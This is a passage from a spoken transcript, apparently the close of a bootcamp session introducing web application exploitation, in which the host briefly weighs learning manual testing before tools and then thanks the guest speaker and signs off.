you very much for your insights. But I also think there's others who are going to argue in terms of the manual and automations, because some individuals or some experts would say, first of all, you need to master the manual so that when you get to tools, it's going to be easy for you to understand what's happening behind the scene, why a script is working or not working, etc. But
Yeah.
Mr. Ian, thank you very much for taking your time and being here with us, and just taking the candidates through introduction to web application exploitation. And it is to my hope in the next bootcamp, perhaps upon your availability, you're going to have a session of advanced web app pen test. So thank you very much for being with us today.
Thank you so much for hosting me.
Okay, take care and good evening.
Uh,